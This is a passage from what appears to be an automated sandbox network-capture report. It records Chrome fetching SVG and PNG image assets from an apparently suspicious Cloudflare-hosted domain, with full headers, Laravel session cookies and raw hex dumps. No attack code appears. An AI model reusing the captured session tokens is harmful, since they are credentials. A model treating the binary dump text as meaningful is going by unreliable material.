                                                              71192.168.2.662955188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC1108OUTGET /wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:09 UTC661INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:09 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgWIN9h9lpFKQjzRTe1lvmppS4WoZYQO%2FJo%2FEJs63gEmhE0lg8p8qyzOKrwKB%2FwJ7%2F%2BKQq2%2B9XN5Toy9fIbF%2Fc5u%2Fe5GdRPVz0s%2FeVDc6%2FYPto9uVxEvN72n5na5LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b459a3815a3-EWR
                                                              2024-07-03 07:41:09 UTC708INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                              Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c 31 2e 35 34 32 2c
                                                              Data Ascii: ,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,
                                                              2024-07-03 07:41:09 UTC835INData Raw: 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 34 35 41 31 31 2e 32
                                                              Data Ascii: 9-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279-.645A11.2
                                                              2024-07-03 07:41:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              72192.168.2.662959188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC1114OUTGET /mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:09 UTC653INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:09 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nWok5ha4xC7rZ8Gi0fpHFfCpUyGLF%2FYlW5EOLyLOmKIjhWA2ZQG3QuH2gtxwLOqbcImwWbuxaQ%2FLiBhAmoDEUTdFX%2B5IbDslzCEhfF1JH95nE2WiPhz888GdIuULTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b459db28c53-EWR
                                                              2024-07-03 07:41:09 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                              Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                              2024-07-03 07:41:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              73192.168.2.662953188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC1462OUTGET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:09 UTC663INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:09 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 49602
                                                              Connection: close
                                                              Content-Disposition: inline; filename="ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mejRPB9QsVVD6cS7RHwD%2BbhY7uIp1e9XGM4sJinrSVODTtDmRfu%2BwI0i%2B%2FVruokul0i8C5MUayEhXQ%2F8PrBQdTXwW6hQAc2xxCniRHbxGsZWYW15Z9FGmHG9V%2FPIMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b459ba043cd-EWR
                                                              2024-07-03 07:41:09 UTC706INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                              Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88
                                                              Data Ascii: =n"I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34
                                                              Data Ascii: gPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8
                                                              Data Ascii: \@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0
                                                              2024-07-03 07:41:09 UTC1369INData Raw: bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a
                                                              Data Ascii: (Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj
                                                              2024-07-03 07:41:09 UTC1369INData Raw: e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e
                                                              Data Ascii: \uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~
                                                              2024-07-03 07:41:09 UTC1369INData Raw: c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa
                                                              Data Ascii: Y$I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF
                                                              2024-07-03 07:41:09 UTC1369INData Raw: d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1
                                                              Data Ascii: 0:JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8
                                                              2024-07-03 07:41:09 UTC1369INData Raw: aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 